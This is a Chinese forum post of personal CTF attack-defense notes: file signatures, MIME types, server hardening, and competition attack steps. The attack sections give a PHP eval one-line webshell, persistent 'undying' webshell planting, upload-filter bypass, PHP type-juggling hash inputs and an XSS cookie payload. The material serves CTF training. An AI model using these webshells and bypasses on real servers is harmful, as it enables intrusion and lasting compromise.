首页
社区
课程
招聘
[原创]个人整理的CTF相关攻防知识要点
发表于: 2020-9-16 00:09 7107

[原创]个人整理的CTF相关攻防知识要点

2020-9-16 00:09
7107

一、各种文件头相关起始位置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
GIF = GIF89a (47494638
JPG = ???à JFIF (FFD8FF) 
BMP = BMF? (424D
JPEG (jpg),                        文件头:FFD8FF                            文件尾:FF D9               
PNG (png),                         文件头:89504E47                          文件尾:AE 42 60 82
GIF (gif),                         文件头:47494638                          文件尾:00 3B                                                                 ZIP Archive (zip),                 文件头:504B0304                          文件尾:50 4B
 
TIFF (tif),                       文件头:49492A00                     
Windows Bitmap (bmp),             文件头:424D                        
CAD (dwg),                        文件头:41433130                     
Adobe Photoshop (psd),             文件头:38425053                         
Rich Text Format (rtf),          文件头:7B5C727466                       
XML (xml),                        文件头:3C3F786D6C                       
HTML (html),                     文件头:68746D6C3E
Email [thorough only] (eml),       文件头:44656C69766572792D646174653A
Outlook Express (dbx),            文件头:CFAD12FEC5FD746F
Outlook (pst),                     文件头:2142444E
MS Word/Excel (xls.or.doc),        文件头:D0CF11E0
MS Access (mdb),                   文件头:5374616E64617264204A
WordPerfect (wpd),                 文件头:FF575043
Adobe Acrobat (pdf),              文件头:255044462D312E
Quicken (qdf),                     文件头:AC9EBD8F
Windows Password (pwl),            文件头:E3828596
 
RAR Archive (rar),                文件头:52617221
Wave (wav),                        文件头:57415645
AVI (avi),                         文件头:41564920
Real Audio (ram),                  文件头:2E7261FD
Real Media (rm),                   文件头:2E524D46
MPEG (mpg),                        文件头:000001BA
MPEG (mpg),                       文件头:000001B3
Quicktime (mov),                   文件头:6D6F6F76
Windows Media (asf),               文件头:3026B2758E66CF11
MIDI (mid),                       文件头:4D546864

二、HTTP文件头CONTENT-TYPE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
HTTP文件头:
3gp video/3gppaab application/x-authoware-bin
aam application/x-authoware-map
aas application/x-authoware-seg
ai application/postscript
aif audio/x-aiff
aifc audio/x-aiff
aiff audio/x-aiff
als audio/X-Alpha5
amc application/x-mpeg
ani application/octet-stream
asc text/plain
asd application/astound
asf video/x-ms-asf
asn application/astound
asp application/x-asap
asx video/x-ms-asf
au audio/basic
avb application/octet-stream
avi video/x-msvideo
awb audio/amr-wb
bcpio application/x-bcpio
bin application/octet-stream
bld application/bld
bld2 application/bld2
bmp application/x-MS-bmp
bpk application/octet-stream
bz2 application/x-bzip2
cal image/x-cals
ccn application/x-cnc
cco application/x-cocoa
cdf application/x-netcdf
cgi magnus-internal/cgi
chat application/x-chat
class application/octet-stream
clp application/x-msclip
cmx application/x-cmx
co application/x-cult3d-object
cod image/cis-cod
cpio application/x-cpio
cpt application/mac-compactpro
crd application/x-mscardfile
csh application/x-csh
csm chemical/x-csml
csml chemical/x-csml
css text/css
cur application/octet-stream
dcm x-lml/x-evm
dcr application/x-director
dcx image/x-dcx
dhtml text/html
dir application/x-director
dll application/octet-stream
dmg application/octet-stream
dms application/octet-stream
doc application/msword
dot application/x-dot
dvi application/x-dvi
dwf drawing/x-dwf
dwg application/x-autocad
dxf application/x-autocad
dxr application/x-director
ebk application/x-expandedbook
emb chemical/x-embl-dl-nucleotide
embl chemical/x-embl-dl-nucleotide
eps application/postscript
eri image/x-eri
es audio/echospeech
esl audio/echospeech
etc application/x-earthtime
etx text/x-setext
evm x-lml/x-evm
evy application/x-envoy
exe application/octet-stream
fh4 image/x-freehand
fh5 image/x-freehand
fhc image/x-freehand
fif image/fif
fm application/x-maker
fpx image/x-fpx
fvi video/isivideo
gau chemical/x-gaussian-input
gca application/x-gca-compressed
gdb x-lml/x-gdb
gif image/gif
gps application/x-gps
gtar application/x-gtar
gz application/x-gzip
hdf application/x-hdf
hdm text/x-hdml
hdml text/x-hdml
hlp application/winhlp
hqx application/mac-binhex40
htm text/html
html text/html
hts text/html
ice x-conference/x-cooltalk
ico application/octet-stream
ief image/ief
ifm image/gif
ifs image/ifs
imy audio/melody
ins application/x-NET-Install
ips application/x-ipscript
ipx application/x-ipix
it audio/x-mod
itz audio/x-mod
ivr i-world/i-vrml
j2k image/j2k
jad text/vnd.sun.j2me.app-descriptor
jam application/x-jam
jar application/java-archive
jnlp application/x-java-jnlp-file
jpe image/jpeg
jpeg image/jpeg
jpg image/jpeg
jpz image/jpeg
js application/x-javascript
jwc application/jwc
kjx application/x-kjx
lak x-lml/x-lak
latex application/x-latex
lcc application/fastman
lcl application/x-digitalloca
lcr application/x-digitalloca
lgh application/lgh
lha application/octet-stream
lml x-lml/x-lml
lmlpack x-lml/x-lmlpack
lsf video/x-ms-asf
lsx video/x-ms-asf
lzh application/x-lzh
m13 application/x-msmediaview
m14 application/x-msmediaview
m15 audio/x-mod
m3u audio/x-mpegurl
m3url audio/x-mpegurl
ma1 audio/ma1
ma2 audio/ma2
ma3 audio/ma3
ma5 audio/ma5
man application/x-troff-man
map magnus-internal/imagemap
mbd application/mbedlet
mct application/x-mascot
mdb application/x-msaccess
mdz audio/x-mod
me application/x-troff-me
mel text/x-vmel
mi application/x-mif
mid audio/midi
midi audio/midi
mif application/x-mif
mil image/x-cals
mio audio/x-mio
mmf application/x-skt-lbs
mng video/x-mng
mny application/x-msmoney
moc application/x-mocha
mocha application/x-mocha
mod audio/x-mod
mof application/x-yumekara
mol chemical/x-mdl-molfile
mop chemical/x-mopac-input
mov video/quicktime
movie video/x-sgi-movie
mp2 audio/x-mpeg
mp3 audio/x-mpeg
mp4 video/mp4
mpc application/vnd.mpohun.certificate
mpe video/mpeg
mpeg video/mpeg
mpg video/mpeg
mpg4 video/mp4
mpga audio/mpeg
mpn application/vnd.mophun.application
mpp application/vnd.ms-project
mps application/x-mapserver
mrl text/x-mrml
mrm application/x-mrm
ms application/x-troff-ms
mts application/metastream
mtx application/metastream
mtz application/metastream
mzv application/metastream
nar application/zip
nbmp image/nbmp
nc application/x-netcdf
ndb x-lml/x-ndb
ndwn application/ndwn
nif application/x-nif
nmz application/x-scream
nokia-op-logo image/vnd.nok-oplogo-color
npx application/x-netfpx
nsnd audio/nsnd
nva application/x-neva1
oda application/oda
oom application/x-AtlasMate-Plugin
pac audio/x-pac
pae audio/x-epac
pan application/x-pan
pbm image/x-portable-bitmap
pcx image/x-pcx
pda image/x-pda
pdb chemical/x-pdb
pdf application/pdf
pfr application/font-tdpfr
pgm image/x-portable-graymap
pict image/x-pict
pm application/x-perl
pmd application/x-pmd
png image/png
pnm image/x-portable-anymap
pnz image/png
pot application/vnd.ms-powerpoint
ppm image/x-portable-pixmap
pps application/vnd.ms-powerpoint
ppt application/vnd.ms-powerpoint
pqf application/x-cprplayer
pqi application/cprplayer
prc application/x-prc
proxy application/x-ns-proxy-autoconfig
ps application/postscript
ptlk application/listenup
pub application/x-mspublisher
pvx video/x-pv-pvx
qcp audio/vnd.qcelp
qt video/quicktime
qti image/x-quicktime
qtif image/x-quicktime
r3t text/vnd.rn-realtext3d
ra audio/x-pn-realaudio
ram audio/x-pn-realaudio
rar application/x-rar-compressed
ras image/x-cmu-raster
rdf application/rdf+xml
rf image/vnd.rn-realflash
rgb image/x-rgb
rlf application/x-richlink
rm audio/x-pn-realaudio
rmf audio/x-rmf
rmm audio/x-pn-realaudio
rmvb audio/x-pn-realaudio
rnx application/vnd.rn-realplayer
roff application/x-troff
rp image/vnd.rn-realpix
rpm audio/x-pn-realaudio-plugin
rt text/vnd.rn-realtext
rte x-lml/x-gps
rtf application/rtf
rtg application/metastream
rtx text/richtext
rv video/vnd.rn-realvideo
rwc application/x-rogerwilco
s3m audio/x-mod
s3z audio/x-mod
sca application/x-supercard
scd application/x-msschedule
sdf application/e-score
sea application/x-stuffit
sgm text/x-sgml
sgml text/x-sgml
sh application/x-sh
shar application/x-shar
shtml magnus-internal/parsed-html
shw application/presentations
si6 image/si6
si7 image/vnd.stiwap.sis
si9 image/vnd.lgtwap.sis
sis application/vnd.symbian.install
sit application/x-stuffit
skd application/x-Koan
skm application/x-Koan
skp application/x-Koan
skt application/x-Koan
slc application/x-salsa
smd audio/x-smd
smi application/smil
smil application/smil
smp application/studiom
smz audio/x-smd
snd audio/basic
spc text/x-speech
spl application/futuresplash
spr application/x-sprite
sprite application/x-sprite
spt application/x-spt
src application/x-wais-source
stk application/hyperstudio
stm audio/x-mod
sv4cpio application/x-sv4cpio
sv4crc application/x-sv4crc
svf image/vnd
svg image/svg-xml
svh image/svh
svr x-world/x-svr
swf application/x-shockwave-flash
swfl application/x-shockwave-flash
t application/x-troff
tad application/octet-stream
talk text/x-speech
tar application/x-tar
taz application/x-tar
tbp application/x-timbuktu
tbt application/x-timbuktu
tcl application/x-tcl
tex application/x-tex
texi application/x-texinfo
texinfo application/x-texinfo
tgz application/x-tar
thm application/vnd.eri.thm
tif image/tiff
tiff image/tiff
tki application/x-tkined
tkined application/x-tkined
toc application/toc
toy image/toy
tr application/x-troff
trk x-lml/x-gps
trm application/x-msterminal
tsi audio/tsplayer
tsp application/dsptype
tsv text/tab-separated-values
tsv text/tab-separated-values
ttf application/octet-stream
ttz application/t-time
txt text/plain
ult audio/x-mod
ustar application/x-ustar
uu application/x-uuencode
uue application/x-uuencode
vcd application/x-cdlink
vcf text/x-vcard
vdo video/vdo
vib audio/vib
viv video/vivo
vivo video/vivo
vmd application/vocaltec-media-desc
vmf application/vocaltec-media-file
vmi application/x-dreamcast-vms-info
vms application/x-dreamcast-vms
vox audio/voxware
vqe audio/x-twinvq-plugin
vqf audio/x-twinvq
vql audio/x-twinvq
vre x-world/x-vream
vrml x-world/x-vrml
vrt x-world/x-vrt
vrw x-world/x-vream
vts workbook/formulaone
wav audio/x-wav
wax audio/x-ms-wax
wbmp image/vnd.wap.wbmp
web application/vnd.xara
wi image/wavelet
wis application/x-InstallShield
wm video/x-ms-wm
wma audio/x-ms-wma
wmd application/x-ms-wmd
wmf application/x-msmetafile
wml text/vnd.wap.wml
wmlc application/vnd.wap.wmlc
wmls text/vnd.wap.wmlscript
wmlsc application/vnd.wap.wmlscriptc
wmlscript text/vnd.wap.wmlscript
wmv audio/x-ms-wmv
wmx video/x-ms-wmx
wmz application/x-ms-wmz
wpng image/x-up-wpng
wpt x-lml/x-gps
wri application/x-mswrite
wrl x-world/x-vrml
wrz x-world/x-vrml
ws text/vnd.wap.wmlscript
wsc application/vnd.wap.wmlscriptc
wv video/wavelet
wvx video/x-ms-wvx
wxl application/x-wxl
x-gzip application/x-gzip
xar application/vnd.xara
xbm image/x-xbitmap
xdm application/x-xdma
xdma application/x-xdma
xdw application/vnd.fujixerox.docuworks
xht application/xhtml+xml
xhtm application/xhtml+xml
xhtml application/xhtml+xml
xla application/vnd.ms-excel
xlc application/vnd.ms-excel
xll application/x-excel
xlm application/vnd.ms-excel
xls application/vnd.ms-excel
xlt application/vnd.ms-excel
xlw application/vnd.ms-excel
xm audio/x-mod
xml text/xml
xmz audio/x-mod
xpi application/x-xpinstall
xpm image/x-xpixmap
xsit text/xml
xsl text/xml
xul text/xul
xwd image/x-xwindowdump
xyz chemical/x-pdb
yz1 application/x-yz1
z application/x-compress
zac application/x-zaurus-zac
zip application/zip

三、攻防步骤

1、加固防守自己的服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
1. 首先更改本机用户密码为:Xyfy_2064,所有密码统一;
    普通用户密码更改:
        ->$ passwd yiyuan1
        ->Changing password for yiyuan1.
        ->(current) UNIX password:
        ->Enter new UNIX password:
        ->Retype new UNIX password:
        ->passwd: password updated successfully
2. 扫描Apache端口,通过SNETCracker检测弱口令,包含root(SSH)、mysql(3306)、oracle(1521)、SQLserver(1433)等密码,如果root密码可以获取到,那么更改root密码,如果其他数据库密码可以更改那么更改数据库密码,注意如果通过扫描比较慢的话,可以去比赛提供的php文件中找密码,看看mysql配置的密码是什么,比如在config文件中;
    **ROOT用户更改密码:**
        ->$ su                                首先登录root,如果可以获得root密码的情况下
        ->Password:
        ->root@metasploitable:/var/www#
        ->#root@metasploitable:/var/www# passwd root
        ->#Enter new UNIX password:
        ->#Retype new UNIX password:
        ->#passwd: password updated successfully
    **修改mysql的密码:**
        登录
        mysql -u root -p
        列表所有数据库:
        Show databases;
        使用mysql数据库:
        use mysql;
        修改root密码:
        set password for root@localhost = password('Xyfy_2064');  或者
        update user set password = PASSWORD('要更换的密码') where user = 'root';
        刷新更改
        flush privileges;
        显示所有的表:
        show tables;可能有flag。
        查找flag
        select * from typecho_flag;
    **oracle数据库修改:**
        Oracle 11g 默认用户名和密码
            安装ORACLE时,若没有为下列用户重设密码,则其默认密码如下:
 
            用户名/密码 登录身份 说明
            sys/change_on_install SYSDBA 或 SYSOPER 不能以 NORMAL 登录,可作为默认的系统管理员
            system/manager SYSDBA 或 NORMAL 不能以 SYSOPER 登录,可作为默认的系统管理员
            sysman/oem_temp sysman 为 oms 的用户名
            scott/tiger NORMAL 普通用户
            aqadm/aqadm SYSDBA 或 NORMAL 高级队列管理员
            Dbsnmp/dbsnmp SYSDBA 或 NORMAL 复制管理员
 
            登录身份:指登录时的Role指定,oracle11g中分SYSDBA和default两种。在安装Oracle 10g的时候,提示创建数据库,在创建的同时提示你输入口令,若此时你输入了密码,在登录数据库的时候用户名sys 对应的密码就应该是你创建数据库时候输入的口令。而非默认的change_on_install.
 
        忘记除SYS、SYSTEM用户之外的用户的登录密码:
            - CONN SYS/PASS_WORD AS SYSDBA; --用SYS (或SYSTEM)用户登录
            - ALTER USER user_name IDENTIFIED BY "newpassword"; --修改用户的密码,密码不能是数字开头,否则会出现:ORA-00988: 口令缺失或无效
        忘记SYS用户,或者是SYSTEM用户的密码:
            - CONN SYS/PASS_WORD AS SYSDBA; --如果是忘记SYSTEM用户的密码,可以用SYS用户登录。
            - ALTER USER SYSTEM IDENTIFIED BY "newpassword";
            - CONN SYSTEM/PASS_WORD AS SYSDBA; --如果是忘记SYS用户的密码,可以用SYSTEM用户登录。
            - ALTER USER SYS IDENTIFIED BY "newpassword";
        SYS,SYSTEM用户的密码都忘记:
            Oracle提供了两种验证方式,一种是OS验证,另一种密码文件验证方式,如果是第一种方式用以下方法修改密码:
            - sqlplus /nolog;
            - connect / as sysdba
            - alter user sys identified by newpassword;
            - alter user system identified by newpassword;
            如果是第二种方法可以使用ORAPWD.EXE 工具修改密码。打开命令提示符窗口,输入如下命令:
            - orapwd file=D:\oracle10g\database\pwdctcsys.ora password=newpassword
            这个命令重新生成了数据库的密码文件。密码文件的位置在ORACLE_HOME目录下的\database目录下。这个密码是修改sys用户的密码。除sys其他用户的密码不会改变。也可以下方法修改密码,设定完后,重新启动服务,再次登陆就可以了。
            - orapwd file=pwdxxx.ora password=newpassword entries=10
3. 备份和恢复数据库(前提是能获得root权限)
    备份:
    1. cd /var/lib/mysql (进入到MySQL库目录,根据自己的MySQL的安装情况调整目录)
    2. mysqldump -u root -p wordpress>wordpress.sql,输入密码即可。
    恢复:
    1. mysql -u root -p 回车,输入密码,进入MySQL的控制台"mysql>",输入命令"show databases;"
    2. 建立你要还原的数据库,输入create database wordpress;
    3. 切换到刚建立的数据库,输入use wordpress;
    4. 开始导入,再次出现"mysql>"并且没有提示错误即还原成功;
4. 备份var/www下数据
    1. 压缩www目录下所有文件;
            tar -cf temp.tar ./*   #压缩文件
            rm -rf temp.tar    #删除文件
    2. 用mobaxterm把数据下载下来;
5. 加固web服务
    1. 通过MobaXterm连接靶机,点击session,输入IP地址,进入系统后按照主办方给的用户和密码登录;
    2. /var/www目录下的所有文件压缩成压缩文件;
            tar -cf temp.tar ./*
    3. 讲temp.tar文件download下来,并且解压到自己电脑上;
    4. 打开D盾,对解压出来的文件进行扫描;
    5. 针对扫描出来的eval后门,进行防护,同时记录漏洞,等待对别的队伍进行攻击;
        - 认真查看题目要求,如果题目要求必须保证每一个网页都正常运行,那么对eval函数进行注释掉;
        - 如果要求仅仅是保留index页面,那么把文件下的所有php文件全部删除,保留index文件,并且对index文件进行加固;
    6. 针对扫出来的upload进行防护;
        - 认真查看题目要求,如果题目要求必须保证每一个网页都正常运行,那么对upload函数进行注释掉;
        - 如果要求仅仅是保留index页面,那么把文件下的所有php文件全部删除,保留index文件,并且对index文件进行加固;
    7. 对页面进行waf加固(老师提供的waf文件为过滤文件);

2、攻击对方弱口令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
1. 首先对自己服务器进行扫描,通过SNETCracker检测弱口令,包含root、mysql等密码;
2. 通过对ssh、mysql、oracle、sqlserver、ftp等进行扫描
3. 如果检测到本地的mysql数据库等密码较弱,通过upload的漏洞进行挂马,然后通过菜刀进行修改对方的数据库密码;
4. 然后获得flag;
 
修改mysql的密码:
    登录
    mysql -u root -p
    列表所有数据库:
    Show databases;
    使用mysql数据库:
    use mysql;
    修改root密码:
    set password for root@localhost = password('123');  或者
    update user set password = PASSWORD('要更换的密码') where user = 'root';
    刷新更改
    flush privileges;
    显示所有的表:
    show tables;可能有flag。
    查找flag
    select * from typecho_flag;

#3、攻击对方eval一句话木马漏洞
切换Python版本
conda info --envs 查看环境
activate python27 激活2.7环境
activate base 激活基础环境(3.6)
单个获得一句话木马:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
1. 打开菜刀工具,添加、输入地址:http://172.30.201.142/wp-admin/upload/xyfy.php,地址后面输入密码,其中密码是我们查看到自己的源文件得到的,一句话木马类似:<?php @eval($_POST["xyfy"]);?>
2. 在菜刀里点击虚拟终端,进入相应目录,查看flag文件内容
批量获得一句话木马并获取flag:
 
1. 打开Anaconda Prompt终端;
2. 切换到Python2.7环境;
    activate python27
3. 进入AWD批量执行脚本;
    cd E:\CTF\CTFTOOLS\攻防工具集合\AWD批量检索提交flag
    E:
4. 打开consol.py脚本工具;
    python console.py
    1. 如果一句话木马data.php文件是这样:
        @eval(base64_decode($_POST['a']));
       那么使用AWDBASE64文件夹下的程序
       如果一句话木马是这样:
        @eval($_POST['a']);
       那么使用AWDNORMAL文件夹下的程序
    2.
5. 添加webshell,假设用D盾扫描出的是data.php文件包含一句话木马;
    add :80/wp-admin/data.php a eval post
6. 添加IP地址;
    ip 192.168.19.131-132
7. 获取flag;
    getflag cat /flag 
    getflag curl 192.168.100.1/GetKey
批量上传不死马:

#4、给对方挂不死马

1
2
3
4
1. 利用菜刀工具,文件管理功能,将不死马上传到一个不起眼的文件夹下,如config文件夹;
2. 浏览器地址栏输入:http://172.30.201.161/xxx/config-info.php,会在该路径下一直生成一个名字为conflg.php的shell文件;
3. 利用菜刀工具,输入链接:http://172.30.201.161/xxx/conflg.php?pass=pass,密码为admin;
4. 终端管理,可一直获取到对方的flag;

#5、攻击对方服务器upload漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
需要开启的软件:
- Wamp server开启
- Ultraedit开启
- Firefox开启
- Internet explorer 开启(Internet选项,连接,局域网设置)
- Burpsite软件开启,proxy,send to repeater,repeater
- 菜刀开启
 
1. 打开wampp软件,运行Apache服务器,并将upload.php文件放到www目录,同时用Ultraedit软件随时准备打开upload准备更改IP地址;
2. Firefox浏览器下运行:http://localhost/upload.php页面,选择xyfy.php文件;
3. 打开IE浏览器Internet选项,设置代理服务器:127.0.0.1 8080;
4. 打开burpsite软件,进行抓包;
5. 点击proxy页面,查看HTTPhistory,右键单击选中的IP,send to repeater;
6. 修改文件里的content-type(一定是文件里的,不是header里的)为绕行的类型;
7. 点击GO按钮,查看发送结果;
8. 注意查看发送成功的返回结果,返回结果是针对当前页面所在目录的;如:http://172.30.201.142/wp-admin/upload/xyfy.php;
9. 打开菜刀工具,添加、输入地址:http://172.30.201.142/wp-admin/upload/xyfy.php,地址后面输入密码,其中密码是我们添加的一句话木马里的,一句话木马类似:<?php @eval($_POST["xyfy"]);?>
10. 在菜刀里点击虚拟终端,进入相应目录,查看flag文件内容

#6、数据库端口信息#

1
2
3
4
5
6
7
8
9
- Oracle 1521
- SQL Server 1433
- MySQL 3306
- pointbase 9092
- DB2 5000
NOSQL数据库
    - MongoDB 27017
    - Redis 6379
    - memcached 11211    

四、CTF乱七八糟随笔

#1、厦门20190706网络攻防大赛记录
题目大致情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
    1. CTF题目5题;
    2. windows7靶机;
    3. curl是否只有Linux有?安装curl;
    4. 两轮攻击,是不是flag刷新两次,flag刷新2次,每个队维护三台靶机,三台靶机flag是一样的,获取到每一个队的靶机flag只能提交一次,可以继续攻击其他队伍的靶机;
    5. 逆向题需要练习,75日练习;
    6. 杂项  图片隐写 日志分析 流量分析
    7. web题型:apache、IIS、php,数据库为关系型数据库,创建数据库、查询、改,查;
    8. 文件泄露,可以下载到泄露的敏感的源代码(.bak文件,进行恢复,vim,1.php.bak,压缩文件,Git泄露工具使用)
    9. php黑魔法,MD5碰撞,ereg/eregit正则表达式漏洞,strcmp漏洞;
    10. sql注入,注释如limit 0 ,1 ,报错注入(网站的Web服务器开启错误回显,会为攻击者提供极大的便利),盲注(1=1,不断尝试)
        - maxlength属性进行(如密码长度)
        - Referer  你从哪里来?
        - x-forwarded-for 来源IP
        - cookie修改,进行欺骗
 
CTF题型讲解:
    1. ASCII码编码;工具:八进制:ocx  十进制:decimal  十六进制:hex
    2. base64编码,base32编码(应该会考),家族其他的编码,6462583216859192
    3. 莫尔斯电码(离线版网页有Morse Code解码);
    4. 培根密码(Baconian Cipher),`下载解密工具`;主要是aaabbb等形式
    5. 凯撒密码(Caesar Cipher):工具:E:\CTF\CTFTOOLS\CTF工具合集\编码与密码\加密与编码合集v1.2
        类似:Uif rvjdl cspxo gpy kvnqt pwfs uif mbaz eph
    6. 单表替换加密:
    7. ROT13:工具;
    8. 仿射加密;
    9. 希尔密码,棋盘密码,维基尼亚密码
    10. 栅栏密码(Rail-fence Cipher)
    11. 猪圈密码(Pigpen Cipher)
笔记:
    x-forwarded-for127.0.0.1
运维攻防赛加固部分:
    1. sql注入漏洞,sqlmap跑;
    2. 文件包含漏洞:include,include_once,require,require_once,fopen,readfile,
    3. php伪协议,php://filter读取本地磁盘文件
    4. 文件上传漏洞,先用D盾进行扫描文件上传漏洞,获取管理员权限(用菜刀),文件上传分为前端校验和后端校验,前端校验(burtsite抓包并修改),后端检测绕过,php3或php5或phphtml上传,上传之后可以以php进行运行,大小写绕过,简单替换,windows特性;特殊文件;
    5. 解析漏洞:apache解析漏洞,IIS6.0漏洞,apache1.x 2.x  解析1.php.xxx时候如果不认识xxx,会从后向前进行解析;换行解析,apache2.4 -2.4.29  1.php%0A遇到换行符停止;
    6. 0x00截断和%00截断
    7. 图片马配合文件包含,windows的copy命令,制作windows的图片马;
    8. php命令执行,system,exec,shell_exec
    永恒之蓝加固:
 
    弱口令:
    - mysql与php后台;
    - 8位以上含特殊字符
    清除后门:
    代码审计:

#2、各种记录烂笔头
XSS
javascript:alert(document.cookie)
document.write()
<script self.location="" ></scipt>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
来源请求头
X-Forwarded-For:
 
Referer:
 
strings可以查看文件中的字符串
 
pcapng和pcap都是wireshark的文件
 
robots.txt目录文件
 
binwalk 分离
 
unsquashfs解压缩
 
steghide info picture.jpg   ——》检测图片中是否存在.txt嵌入文件
 
steghide extract -sf picture.jpg   ——》破解出隐藏在图片中的.txt文件(过程需要输入加密的密码)
 
var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' == '1e3');
var_dump('0x1234Ab' == '1193131');
var_dump('0xABCdef' == ' 0xABCdef');
 
带有strcmp或其他比较类型(如strcasecmp)的php代码用数组绕过,如password[]=5

#3、WEB题#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1. in_numberic判断是否为字符串,但是在php中$number==1是弱类型检查,如果$number类型用科学技术法表示,如1*e*1;
2. 本地包含需要谨慎,通过eval函数特性执行其中内容,可以通过request请求进行截断然后通过file('')函数和print_r函数输出数据;
3. 看到$$符号要想到全局变量,php中全局变量有:
            $GLOBALS
            $_SERVER
            $_REQUEST
            $_POST
            $_GET
            $_FILES
            $_ENV
            $_COOKIE
            $_SESSION
4. JSPFUCK格式加密;
    碰见这样的(![]+[])[+[]]+([![]]+[][[]])[+!+,放在控制台运行一下试试看结果。
5. 在题目中会有提示,比如栅栏,猪圈等,比如HTTP头等,注意细心体会题目给的信息,通过查看源码、抓包burpsite的go命令多次取数据及php页面的is_numeric、正则表达式等漏洞进行破解;

一些在线CTF网站

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
xssee:http://web2hack.org/xssee
 
xssee:http://evilcos.me/lab/xssee
 
程默的博客(DES,3DES,AES,RC,Blowfish,Twofish,Serpent,Gost,Rijndael,Cast,Xtea,RSA):http://tool.chacuo.net/cryptdes
 
在线编码解码(多种并排):http://bianma.911cha.com
 
在线加密解密(多种):http://encode.chahuo.com
 
Unicode转中文:http://www.bejson.com/convert/unicode_chinese
 
OOK  https://www.splitbrain.org/services/ook
 
栅栏密码 && 凯撒密码 && 摩斯电码:http://heartsnote.com/tools/cipher.htm
 
凯撒密码Caesar cipher:http://planetcalc.com/1434/
 
Quoted-Printable && ROT13:http://www.mxcz.net/tools/QuotedPrintable.aspx
 
ROT5/13/18/47编码转换:http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php
 
Base32/16:http://pbaseconverter.com/
 
Base32:https://tools.deamwork.com/crypt/decrypt/base32decode.html
 
quipqiup古典密码自动化爆破(词频分析):http://quipqiup.com/index.php
 
词频分析/替换:http://cryptoclub.org/tools/cracksub_topframe.php
 
'+.<>[]' && '!.?'(Brainfuck/Ook!):https://www.splitbrain.org/services/ook
 
'+-.<>[]'(Brainfuck):https://www.nayuki.io/page/brainfuck-interpreter-javascript
 
'+-.<>[]'(Brainfuck):http://esoteric.sange.fi/brainfuck/impl/interp/i.html
 
'()[]!+'JavaScript编码(JSfuck):http://discogscounter.getfreehosting.co.uk/js-noalnum.php
 
6 个字符'()[]!+'来编写 JavaScript 程序(JSfuck同上):http://www.jsfuck.com/
 
http://patriciopalladino.com/files/hieroglyphy/
 
摩斯密码翻译器:http://www.jb51.net/tools/morse.htm
 
Morse Code摩尔斯电码:http://rumkin.com/tools/cipher/morse.php
 
摩尔斯电码转换器:http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx
 
字符串编码,解码,转换(长度,反转,进制转换):http://www.5ixuexiwang.com/str/
 
Cisco Type 7 Reverser:http://packetlife.net/toolbox/type7
 
Cisco:http://www.ifm.net.nz/cookbooks/passwordcracker.html
 
cmd5 && NTLM && mysql...:http://www.cmd5.com
 
spammimic(字符2一段话):http://www.spammimic.com/
 
js代码在线加密解密:https://tool.lu/js/
 
JScript/VBscript脚本解密(#@~^....^#~@):http://www.dheart.net/decode/index.php
 
VBScript.Encode解密(tip:Asp encode):http://adophper.com/encode.html
 
JScript.Encode脚本加密与解密:http://www.haokuwang.com/jsendecode.htm
 
